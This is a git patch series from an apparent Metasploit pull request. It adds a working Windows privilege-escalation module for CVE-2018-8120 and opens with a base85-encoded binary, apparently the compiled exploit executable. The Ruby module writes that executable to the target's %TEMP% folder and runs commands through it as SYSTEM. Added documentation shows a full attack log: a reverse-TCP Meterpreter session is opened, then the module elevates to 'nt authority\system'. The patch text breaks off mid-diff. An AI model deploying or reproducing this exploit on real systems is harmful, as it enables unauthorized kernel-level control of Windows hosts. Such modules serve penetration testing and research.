z!-fq}nwF7KUr^tuS+vxzXBI51$NUA8oPvTz__U|iH`c?KhG|ZDdAY?BQ|Ixl@OaLf z-(cz_zAY1Ff2jDITN%^5fxc~w)!b(XV{dsliyy zCVLsHxmO?K1P)J|B-1;Dv4!za#x}-Q#>tFrjO~mS|238IFt*QNJe+YR<0Qt}jA;j( zJ{My;R7PI`W5uss#5hG-YekF|zqXvQ;@5f@D}HSqW6VFrSI=1SZyOma{_Q5lc6Ps+ z@p#5t7%TqmR>l+9ejDS7jCU}e#JGj=*BG}m{yO6h#%i|S$@mJk?_!+B*kF7m<6g$; zjQbd0#aR2Atp95nTNq!**v2@MaWdoSjO~o&Y6i;$#yD~yz6{3Mj58VQjI$Z%Fm^F^ zFfL#`i}51HH!&_^oXfbJ@odH(#y2yrW31*M^^E7TeIw%n#+w-5%6KzlHDB1m_;$A6 z%Gk|#8{@T%cQ7__2hhSef^i39GvhACk&M;6DvEJ0+eb6jzAo!ChOv#Yg|VG+EaPo4 z(tSMR47N{ToXvO$;{wJ*85c3OGWIaGF|KEv$XLx6hcQ<3MH0h7-zIjS#CQwi5sbGn zzJzfL<7CDij8hnQF&@ddm+>gZTB^+dXvQ|iV;I{Rk7b;}cpT$w#&*U9jK?!BVtg56 z590}p>lsgEyovE7##iR#rPV=ix^+axSa8IjO!R@GHzr%o$+SIGZ=4WoW*zt<8Lr-XM7{$PR7}c z4aPd-KE^qWEmz3=I~dy;I~iv%p2awu@lA{i80RuBVmzC%hw;sf>lx=U-o$tg<1LKm zGTz3xfN=}sd5k+4-^#d)@j}MEjBjVGrOEud8QT~yV{B(!$vA`YI>ywO< ztpgR~r-wIdn{fi;0>&d57ctIa>|t!;30^(pNXDBO z$1vW)IF|7?#&L{W7$-39U_6p>7vn6(eT+>!VYEz^`Hy9s%s7s5D&qvknT$s=b}`Ok zT*TPK6G{)`SjP2?;}~yZJd*Ji##xMaFgDp~^wYF<#<6w*wNA!yj1A?Vai8)(QM$KW z#rb8N%s7s5D&s81nT$=T(!WdjXS_)HXI!q_Un$+!Dff&Um3zjUmHQ0oeyeiNc!zS& zxLvuQCf#=`_lynYo^hXYpDEp2GGzYa7$-BPOH1^nDtpG6%063IYc6Hac#*;mXyds_G;a(*7Y{F zXEM<2jB##Md>M?lGgj+-#RqV)y_4UgY82cjP+sat2n|3gMhV9!K|0`p)j#2BjPPPxQz2ZZ}FgDm;t-};w!ov1_ zZ2uHv%T!tZuQN_&{0qjZjQ26lWc)B=7vr6b7cqX7aXI5>8P_p>i*Y044#t}q-^_R` z;}*s{7$0G*_$;xE+u8mQ<4(r!F*X<^#+{6hF*X?QVXXKd z6Bzfgy;?^rzJ=m@Sgw)fQ>nsdzJ}tXB(r_F3U3f!ES2r^*gl#2+sTYG*}j&s#^J{^ zcCr0;7%yV{6UOC?f5o_taX#Zl#?LX{%=krxIX#N6vX$){*}jPF6`y7Y+bceUh0~kB z?%Ua3@jdM9U-5xD+1|(Q%h^9qdo+XXpJw|$#)|J@WA{VY-g2$1pSg?`Un-SxGTYzH zcnkX<$2gVki}+pkdl%b(m+>OTw=hm+_cq4mY(I~&jmsyUaUI)x z8E3Hl)r=e2zD~Jk`x%Tkv;BR_KgXZQcniC~k?~e`-^6$aZx!QY#tn=&vHKesr?UP1jO*Dxi*Y8~ zuUGEbK7+A~?H^~ni17-><&6D|>liO!oXPne#<-E~zsGnp<3h$;8GoN~Hv1pWcn8}z zGhW2$y_Ru1+pl5lV*g2uJK6qL#szFYg0aE&3mNw@-ptsNDa-#s#>tGIV4TW$E8|5R z{w0hv*?tk@BDTMjv5W0*W32e1*E3$k_8SyVDf5wk7_HcYDj5o9W9gKId z{bh`|vVEztXZ$kbcE-CHcQW3_*kHVaaUbIYj4jh;dG2Lg$MKJ3oXqxjGFJ2U4;iPj zeH-I!#xF5m#Q3L-J&Ye^T+i{1V%*5~|IBzZ#;I(-gz;v!AImtC?TZ+@IQ(e}v;7Yl7cstsq+>t>@?F? z!h58&i%lP$#H5eTF-cX{810kOS0;AdNtGiXoqMHE?#gT8L>gf_dr2Ri_n?o?b1;WD<-7-7jFO|z&FQM*aEnnA^etn5bW)Z+I=@OE-GiZT z8M|M`;nm{IAANofm(Ci~N4Fv9qx%o^(P?w3%JkEDLHeqK8AXu^by^q11a}Je}q;1M2D0f<(}w~%1`CLR{JKf9t^)0 zrA_v#Jcv%yky;n0hv=2C3XkZP(x<{B`lb9i*gerPonHvm7nRpcO^wGy*A$;BU$@Ag zGZ;V7c{);eD~Ct)PFR&6(LKed(nIv04%c(oJ+%YMUp`}M4}@>W|2+8hG5t~d2&Wrr zC+YB|@`xT-% zS#q*}p%5j7eG~bil9|ahL#M*S>#<7I)0|*A%l;@=Q|mDrhp4|%?M0s738jz5BZ^JU zS7|(=*i^m9{vqUF_75TZYLWl&{(*)IgxkzWVtwl^e4w}SFk+*MznvMD&MM3$ zLM>Ou?+DV5j6Xlv52*M<{UOC4qBj{o-Pe(yj6am#C4#;v{=xMx)1hisrh{%M$WNAk zZjcUTJOx2}8BadfE{)HUZZ8xM^#F=OWjuvJ`jPR3`bilN-IkDFc(?=Wm2UBbMkX09 z-LVKy|LibK?d;ZIerm;xCNz>u|F;G0Wx8^L{fH{(P`YH#qbN)ISG@?$uc)482J2Oo zpK90A{p?^qrTfAl9ZC0kuwJG6ys-38__qho6HE81wW;=YbC^B3F9_?0s629lPFeLE-N2=Gm~aU&gaug)1>j3wIwn zfhyBOv>I+tx5L8mHwW3%C>L%|qf|InvlJEo%CP*>XeE2|lCXYUn#li^uva0_dLkXE zSK-U~vs!J@e46Nn?nKE?_9sgaLOMp)P&jg)O|>dNT946PFSTx`w4|eyRXNFdcPVBm z@{|3XJOfQ85{J(HN=*O5-P5hKfmp6K)H)#@(@=hFQ>K{}M}iKtDv zr}C$p-r<;T*$u>l?FafV9pqo0-KG#^e4+Z5cq!;AJpA$?-AMZ?+&&Jsr@M{eSgjgW z_;lxcp#8w~d4hB+!>3tIxO@K~d%9hz>}j4vH{KPdd21*?avec;>*XiceTr*9d;^-V zt5ve(BT#v(@Z|Uyq927-KO`~zSK-t6SsA29X5wAr*jo7YVd@9zzx?F7B-~!Mw~#&Isv!Nz^&9<{pIp}~?vdmth0~9m z=PND~*;D-C?kW6Ge<0Ukq4Y>Tf#OOLKZfX??oY~3V)`#XH7`~@hQg}FE38_ifcpT`p%zvVhm{tqvoaP#o|O1{i;q(Xj@e-cWMobOS8B72w+mK3Y7@-K0DFg+5} z{dM_CTpR2kB=!ZzPsy(d#h-(jIjvb1U`9TX!}y1Si$mxArQ-g+{5#+7d=nRLV*jpYm`22ML^4|Mp=0r(VGBe}n=|>wT>Xj}W@k2Sp!=_u+mI`p7Scet=Z zuzth+4>UGy3_RHUt%o*!`{75v^WE=#fAgdN{Da3H|KSr`e)Qy1KmN&2f422se*Uk& z_~oyj-uCO?JoD^tpWD9U`JFGk_|nU-w6wPE+WqRDz3uzXjRoc;38e>sOYI3moE zQPDA$*tqzFAw#XU#9_meMqF}fa>~e2qsNRLXCHsrgo%^B_Vv`uuSmNxeezWqS5KKb z?V4+^%bY$V>-rnMabtGzl9Ez)+0ycgyO&i~Ro8gF>8dCwhpF8-&xiY{({ z@2b^n*8Xqj|9?CF|8n{3GjklySvR?IXWyKcKWA>iE%W9V;+=s-x7{ww|Kj$47v=w7 zCBKVj?<pcj;v1&*}BncxTv! z91$Ufz+P5dQR(;6+?K)>_V!7oalqBSW!~z_D$ithotXMo`)X>*L}B3`GAkVJl{LksFt%T57rOAs?G@FKl2KebnNlg!J;-0UYt2;*X&bekVqZylVeyhm zHI3JDZgr+l$+$W*J@e`*8FqJ_r?RHPXJ4|?p6#!Ocnoi9xzFdRopIGwODlZk{w0%3 zYO1c1HkXTd7m&1w8RU^l#188!NV$k}))iNID#I);t9JYBen^P07nfF5RP+CtQiozr*5i);s!fVq`1r0l{r#U{ZPWP=9UZ20XGT&WQ1Gx=U zKeJG~c3+L%>#nV-T<*4C#BFLu-K0gA%iLH$5Z+!Tq)y33dUf0 z77InyhlND$AnW5ovM&ZWC3--H?I=A&fl~6>CskI~UAdyh3+hl1^Z|E;-ioDg13@VE z<^IZQx3_pnMP-F=<>bkeh5cL<%?groQ@s>M6il2p$9Ie0?OmA*VKv_6qOp}hJc-Q5 z`Q>vVw_%y0{39LCO80WKA0z{UFqR{@rEW@s_{ct|(p_9l)_zaO9I}-bW1d!swcSd= z-yrE@Qc5Ao2Bh`AADCoEO~TsCjujvMr=5-Y@a4pgij?gnD{7$#V?KNoLuTEb*ynd+ z6-#_o$$Pm2t4NA32l0_aMG9HUm?9Z+B-vmgY{`d`2R2^212KExi(;UBaOK%cyd)#2 z)V=~u!S1O*%PbwwvMouUl8abhGNaTcR36T>_agmpFY1-}vy!mI>w3M_cZKSCsIjY0#i71ffU9W1| z_;JzNxIey}eCbE8BwKdxNp2aYX?eqOjy>0;jkiQ-mT9|_3GW^OnGDLT^wng-Z{hbE znIRJcakQo(ObuabgTgeyEt00iO^epzrbK%ZaUt4@d|0Q%dkU|I9qcP{xOq8#?-&61 z5>w)|6kmdtQW~$NOoM*jh~D8{i5=uV0`>;nUTKHOijT>)ru`P!X~)yIj1yDLTFT53 zo+J!pDvrIdHzVP<{1rC=*zXN@Gs2>c@Znb)qm4lNM@&iVQsF&=elKG}D7;va$5<_H zUUV>Db}al~#IFuK%oXXpPpapcm^ji)Nh{ zD&sP=>rVW3s{GrcHJdL+vmsx$DG9-R%|Mwg#_x!7ml&-jq7D+L4C#vZ#1*Oh$4`aK z6a0FWJ1VPb@l-~=)~+Ef;cidD-K1&A3)gSTwei5U=1Hbw7^PTe?#lJMDRGtm!$;#$jxULKvd$#G&n= z{h&OO=Gi=^LHRbtMrg59qB2r4;#P)rW56FO15ap zrT7)bXvrws4@IyM1kq(%NS~Fd0(Jn<@U0MhgZQ{}?!#yT@f@UurqS*`M zH9N}PK4o<8$gbp$OIngVMC;UE678_xJx;Ux#=`9wxErn6aj`R{_tLHr9g^me6m7?y zcy$fGv0Uzdg#LlMLO2n^1%@Nu;Zv-F=E#o^<@zK1rn8@Cp#KEFd8%!OwPn>FFD*sC zf}iqpE%b}=Q+`Z>CgVYqae^jIV-mD6zIbg6%47`6WDLq=%oLIO783+244D?I4Ve;M zV2X~=qNhY;$o>OT3cb-D69hI`ypbMrQACDpbFyDibom}OUTt7fdyrmIIgA3?r=TxE zd8Z)0lqsT5X;J>3gWFZLkh8$~jODhf>|?<;9D*N}KdFhA#-Z-4sJEforSpdOCU#jn zi0YO5Ux1N46`M&v9#C#Eq7PJVBCxr68-8ud4fT5;q0jS$r4xOha{mGj;d)nv+^0;6 z(=I7Y)GnE3(=PE2>$Pjp21kKO^Yv(?aPCMY8mGQI@%+9rnC|!Q*R*r^ zeZlz@b>fZ45PmMwXME74X_syc^%*8HCRkB_L$#E`A*e%)4-b#%5`6*2FjGu~7GwH> zs2{2$`q3xa3)7J*$6XI=+A;hRy4g(!MTL0l<_3v}2e{UxF-ZJPCP zyeB1nh;y8882b7|(3edco-_2}xL!+FbVp>18q2Akq(3YC4b`l_5&o_j=d;0|q|4z` zhk6J5qx2_Uq)-3&Cz=-j(@>u-%Jx3QBgzNmQW%BuiPVyYp&yNlAX?5a4UN!-PKnDf z4WsgkLwP}+BFigLmV2;G+_p{AYVZq|JN3oLqwP1KLJ#%+vc6IvbY#f1ByGsaXb;gO z?fIraP)Ynr+3tg8=?U66-w177X%hPGVcNLg1jo<en|@ zoRrRa=x0Q~l!$)GhJMM4erc#S=3&{Zri_Z#5=@C&cw6z1UolP%!#I_Qcrac)983e( zH)ypKw2J;*%w@bIx>Ay(wAc?+NU}{9QCi1DYeP@QbSWFkgNQ?nA7Nw4u%s@UCzyss zYr{Sot_|}gYQql47l``04B=pom#EU35h2P#gcB8^MNKntnT$u7Bww&hwjnK^Le+va z?H71!!QKlwpZvxKthG;J<~a#DRAKH?>8%F1+ZN`|1+yZ!+Y)A04zmK7UFiGAdm^&j z|M8xPEQkNC_e2(&!k_0jXu{e)NAgA>3)Q_)dxs^YD#iewPK_Wp17xadRb-Z5Q|hmD zOW~oowl+U<9@su4JXF(OC3~MN{iM{azVpzCHV-a2O*dEO>;iv=~m2K=|g!etSEKoloxxoccPTG zuqJ4)?WGXr`%1ZbwG&Z7`mZ3Ticsi;=Yao*l8rVw+?C)|4lbC@CLu$ZTn1$ae;~`G z8hkc)P5~D6VHn8>BZ6ZlT1X=-=%SEkkF<(@+wO(C1-&0X7NmO#3Qi7muH^qj1SDsaE_b z4(b}nED^t9{3G-6_>uWF_z}hwLEs$57>Iuil{K!5Tg+k?{$_!fZnUv-tc#!pZedS>P|55kv8`bhH&xoW-_rC zKQQ!nn3@01BwdtDcy@YGGO_=6rs97utpB$N!xSMUEB_c1l%o4q-Z!2L_NVVl&5wQ} z)pbvF{h4&xYwCr%74BP~diyE6v_9|ux^vPfo7LZbMfWsKKap;Bej2f(s=TY zi-*7FN5aP~m{8sF_CLLC*Y0}z?zg9$@BT>V@4L?6yxkg^vVyw@uD57h%nA1uDeWU! zwXmANs*TkoR+CvB&FVx}Gg!@J)x~Ndt3|9g$7&s`t5~gPbv>(%tUk!Sk8Au)3AiXIXubRTchj#;>vZCaYbn_OjZ?swGO6QxdDmtlC-4VAaLy|7q`hz?>-W zJU-h)$@OTBo;`zbnhLn71vkig2H7P8t`aI}Eci5{)a>C(I2H&5FybOX5Mu!evS`{O z%%A+3%uHsYS2d+uh`4y+c~*#mlB>W)K}nC(Cq3;M7399Zommb&+g_ii&vVan*Lj{F zpYObR=bd-H@4T~_$@?+`-#>ijy5D5LWYA>TWW;3DWXvRIGH0@2vTU+u5|8az+NaH= z-K4{$)1=EJYtm!VYtm=ZZ!%yqXfkXvYLYXVGdWOx!CWtyteC8svsat2Q60pADK|EFBL;EUyadAt9u&*^x6-!WAde|5c`Ek=5QHONjj z82baq`Q_stSpOVf=t$GO2`#iv3)O8PjnczQjQyN`>`%j0=F(-B%S4TG|5(y6MT!Bx z2K>2hqETM6$z}L~H$*@3eqpJtVsJy-aQf_7y1%6RG8S@%a@z5I#Whn`x)E`I9p)|0+Q-R7`fCf7CV@x8sDww+2J`tajZZ+~ya)&nBVE=yCCuZ**KXWZCL<%a-r+O!rMbk=`oQ+;BttYiHKaT3;SD`|(fSnk#Ruf7rNND9%0_SvYOqPoK8`=xg8i_m0Ad89ayR zd$rG4K65W_{rX`sNdMH`v+kSlFSl=edf_E&e(Qeu;OLH_@Axiz@wMN$OBan;J7w4u zb#M9uH=BB4UZ;M+FK<|P$~~^NXYz`7-{{``=1KRSGiUaZQAWqPvgH-Pt|<=Ij;E9_V(D9P!FKJv%3iZC}5_-G1j?FFpM1 zjIK+5aj*OE2TdC<-1X$6-}CZydLH`0FFyy6%Iiv039&kL@b_;8)2`9e#`p^@7jiA1U6h@XbhWU3Z^EGztSkj1FlCnQO*W%i5+9~GC_`?wla|GHCRz~8Qf&CJPj578`yaGY>v4iu>^iHt#YKCb>It%&{l!vGx=vZ=K z$xOF5!fOQOA%+liTwUNVO8?8KwpM3V;fN_Im`p6&Kx3=xN|bh!`}{)nsf-+>M|z3*bs8yh5G`_%?#t>ooY# zSd@u&>;nJ8)OGMddz@Kzaq|zac+y7lQH^z>9rG{!2j#LHUW}X2EmlW^m8l_}vh? z0!HsaJ3$klzZdm~&Vw}s)t@-nZ)gj6sNL|NICu`m9wWa69F3ql5H&>qIR-Ad4`m_G zQt(3r<@pG-br@w5|LT6^NBR)(;9PhPeF(f@p5d((^dhJ}#M88nJjCXIF!n|4G&Rvb zAJ1ZEz$@?##C^zL2B&u7c%gg1lL#ua3N|k=>PEbFv7uS;UQ_$Qh^b59-!8#9fO5Rx z76ctvH@H0n-=R71MFf?f2Y-VgPd)s^@LsueuAKSo(AVe480cg zt~NCB|`uj3?&7(Lckbg9I7D0WGS;sIxK~SD;VDn?> zQ>ZiX7=q6K3OF-rlpg_KM$j?#f`9qAp@)F;5&iyvcl-$FF!Iats9Ysh(fcV4-td*gYAfJ=peWl5r>X}J2zom8MG&cI&U^SU;89H zL?n=Y8vNlF;~4$mjIC%>q|XG8J%#HRbcKkZYXWh~(}stBaPKyFf@@R}ob(K?>Cis# z=Ll+}9`LsaI`%=^am_@Kz6X4dH1b!$%Xb**!$Acx9O;8N^f>|kLKD}CcsD3?6#P8F zFdLwmB+d&8XrepCFh7H4!A}v?cBjE{X`?>P;7kP7fw&2A1o>lNbB19~Kocj*3xWLo5JCoA<`Ta z(nOjYLYhePJV+C1o(5^+K~ocHz6GTd2UiVEq%r=KPNZ@8q=_^JpEPm4scCFHjdQ1T zB8^ceO{B5tq=_`vn>3NeZj&a`_+8S(QKrVx{(1R-??6NUZ^Sm^Hu^j_=zrP3_v)`m zr}u4o@R>i?z^tT9Us_t+;RT%ob46Pl$6o7fw0F=LJIqULZM<{lEn{4b_Rvy{ylU@U zw6LSK@xhKzqkG~vzTVOv3gM01oe$bkz`{^#Bi?&|V`xsGV?ldp%z}AymMjV_x_{{y zOnAMqJ+$E35^rk{@0?LrCs$0N*i}o|903i)G=on z=5ju0t|Mhh$6~w$9TO3~1G6qe=RQ3DsXH2#h9$w(b?MA9-6vv`6A3I zZL}|&H)+lsj6G~^yuZCO)X`{fI#*6h)9>C(OVbzX)Y5eB;IMg1(|~VS`BGbaDmT_cU8BfNS z31q^VXeOSKGWkp~Q_fT~^^8Tf$qv~idt{#+ki&9Rj?0pqmy2>)uF7@UqSzFN;!-?{ zPYEbtC91>~Ny#fkrL0tyx?)jnszY_D9@VD?)UX;=u6;h>CB~?o?X=~b^cBa|1H|cQmeH)5 zU2|%z=GFXKP>X0Wjni^kK`Ut$t)?-$Rk!O-oz=a%Uk~aLJ*IPdPA}*sy`tB2OzdOu z^%EV;%Go(5$8uiI&jq;%7vnfC#}&8|SK(?L!&`Yf@8ntD%lr8tAK_y>$LIJ0U*ao# zjb{X_U>BSMD|iLJ5ELRpOyJOC3qlF~wI(p46}`?WvZ7b?i$O6W#zaoci3PDFR>Ydf zB&-R0!kJ(b-h@99Ohgi~1dRk3f~ploM~3m^-qx&VBppS|)zNkqw4M#^=Rga(q#(SB z!yO6!(cgl&*XXam1y0-G zwF7Ru;I{{k$I;`;=xsK*8-TlE_*+5$s-cH5f(72%;4bwu7Cp_2zUD`7BbTG_Igao5 I|5um)1iaR?OaK4? literal 0 HcmV?d00001 From 882d182fdbdd08c975daedeef4eee76ada03d093 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 15:13:12 +0530 Subject: [PATCH 03/39] WIP: Updating Thank you bcoles --- .../escalate/ms18_8120_win32k_privsec.rb | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 0ae4d589ad..604575212b 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -1,8 +1,9 @@ -# This module requires Metasploit: https://metasploit.com/download +## This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post + Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Registry @@ -11,14 +12,17 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Win32k Elevation of Privilege Vulnerability', 'Description' => %q{ - This module exploits elevation of privilege vulnerability exists in Windows when the Win32k - component fails to properly handle objects in memory. An attacker who successfully exploited - this vulnerability could run arbitrary code in kernel mode. An attacker could then install - programs; view, change, or delete data; or create new accounts with full user rights.}, + This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new + accounts with full user rights.}, 'References' => [ ['CVE', '2018-8120'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], ['URL', 'https://github.com/unamer/CVE-2018-8120'] ], 'Author' => @@ -28,15 +32,14 @@ class MetasploitModule < Msf::Post 'Dhiraj Mishra ' # Metasploit module ], 'DisclosureDate' => 'Aug 05 2018', - 'Arch' => [ARCH_X64], + 'Arch' => [ARCH_X64, ARCH_X86], 'SessionTypes' => ['meterpreter'], 'License' => MSF_LICENSE )) register_options( [ - OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), - OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) + OptString.new('POCCMD', [true, 'The command to run from poc.sct']), ]) end @@ -71,16 +74,17 @@ class MetasploitModule < Msf::Post raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) - print_status('Starting module...') - print_line('') + print_status('Starting module..') + print_line command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename print_status("Location of CVE-2018-8120.exe is: #{command}") - + command += " " + command += "#{poccmd}" print_status("Executing command : #{command}") command_output = cmd_exec(command) print_line(command_output) - print_line('') + print_line end end From 07b79936b97e044e9dae879d5143a7d985c81d66 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 15:28:00 +0530 Subject: [PATCH 04/39] Fixing spaces at EOL --- modules/post/windows/escalate/ms18_8120_win32k_privsec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 604575212b..60b20ecc50 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -13,9 +13,9 @@ class MetasploitModule < Msf::Post 'Name' => 'Win32k Elevation of Privilege Vulnerability', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 - when the Win32k component fails to properly handle objects in memory. An attacker who - successfully exploited this vulnerability could run arbitrary code in kernel mode. An - attacker could then install programs; view, change, or delete data; or create new + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.}, 'References' => [ From 03d50f27739c29aae72926e70fd5e0c4293f206e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 15:41:03 +0530 Subject: [PATCH 05/39] Adding documentation --- .../escalate/ms18_8120_win32k_privsec.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md diff --git a/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md b/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md new file mode 100644 index 0000000000..09afbd29a0 --- /dev/null +++ b/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md @@ -0,0 +1,66 @@ +## Overview + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. + +To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. + +The update addresses this vulnerability by correcting how Win32k handles objects in memory. + +* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 +* http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html +* https://github.com/bigric3/cve-2018-8120 +* https://github.com/unamer/CVE-2018-8120 + +## Verification steps + +1. Start `msfconsole` +2. Get a session +3. `use post/windows/escalate/ms18_8120_win32k_privsec` +4. `set SESSION [SESSION]` +5. `set POCCMD whoami` +6. `run` + +## Usage + +``` +msf exploit(windows/http/badblue_passthru) > run + +[*] Started reverse TCP handler on 192.168.1.102:4444 +[*] Trying target BadBlue EE 2.7 Universal... +[*] Sending stage (179779 bytes) to 192.168.1.105 +[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.105:49214) at 2018-09-18 14:52:55 +0530 + +meterpreter > getuid +Server username: zero-PC\low +meterpreter > background +[*] Backgrounding session 1... +msf exploit(windows/http/badblue_passthru) > use post/windows/escalate/ms18_8120_win32k_privsec +msf post(windows/escalate/ms18_8120_win32k_privsec) > set SESSION 1 +SESSION => 1 +msf post(windows/escalate/ms18_8120_win32k_privsec) > set POCCMD whoami +POCCMD => whoami +msf post(windows/escalate/ms18_8120_win32k_privsec) > run + +[!] SESSION may not be compatible with this module. +[*] exe name is: f4MZlRO4LZ.exe +[*] Reading Payload from file /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.11/data/exploits/CVE-2018-0824/CVE-2018-8120.exe +[!] writing to %TEMP% +[+] Persistent Script written to C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe +[*] Starting module.. + +[*] Location of CVE-2018-8120.exe is: C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe +[*] Executing command : C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe whoami +CVE-2018-8120 exploit by @unamer(https://github.com/unamer) +[+] Detected kernel ntoskrnl.exe +[+] Get manager at fffff900c1a4e720,worker at fffff900c1a52060 +[+] Triggering vulnerability... +[+] Overwriting...fffff80002a35c38 +[+] Elevating privilege... +[+] Cleaning up... +[+] Trying to execute whoami as SYSTEM... +[+] Process created with pid 3516! +nt authority\system + +[*] Post module execution completed +msf post(windows/escalate/ms18_8120_win32k_privsec) > +``` From 1b220514bb0b58f864fed946ea9b138f16bc52d8 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 19:23:39 +0530 Subject: [PATCH 06/39] Updating --- .../post/windows/escalate/ms18_8120_win32k_privsec.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 60b20ecc50..36c8d954cf 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -1,16 +1,17 @@ -## This module requires Metasploit: https://metasploit.com/download +## +# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post - Rank = GoodRanking + Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Registry def initialize(info = {}) super(update_info(info, - 'Name' => 'Win32k Elevation of Privilege Vulnerability', + 'Name' => 'Wink32.sys fails to handle objects in memory (Win32k Elevation of Privilege Vulnerability)', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who @@ -19,6 +20,7 @@ class MetasploitModule < Msf::Post accounts with full user rights.}, 'References' => [ + ['BID', '104034'], ['CVE', '2018-8120'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], @@ -31,7 +33,7 @@ class MetasploitModule < Msf::Post 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], - 'DisclosureDate' => 'Aug 05 2018', + 'DisclosureDate' => 'May 9 2018', 'Arch' => [ARCH_X64, ARCH_X86], 'SessionTypes' => ['meterpreter'], 'License' => MSF_LICENSE From 8e0d10492539c01ebc92b0cc9d98725283f11385 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 19:39:52 +0530 Subject: [PATCH 07/39] Spaces at EOL --- modules/post/windows/escalate/ms18_8120_win32k_privsec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 36c8d954cf..44c1c4ba99 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -1,4 +1,4 @@ -## +## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## From ad59a522984fd2b3e24430e9a581f8f816d20986 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 22:56:45 +0530 Subject: [PATCH 08/39] Updating --- .../windows/escalate/ms18_8120_win32k_privsec.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 44c1c4ba99..88b3f12318 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post def initialize(info = {}) super(update_info(info, - 'Name' => 'Wink32.sys fails to handle objects in memory (Win32k Elevation of Privilege Vulnerability)', + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who @@ -30,6 +30,7 @@ class MetasploitModule < Msf::Post 'Author' => [ 'unamer', # Exploit PoC + 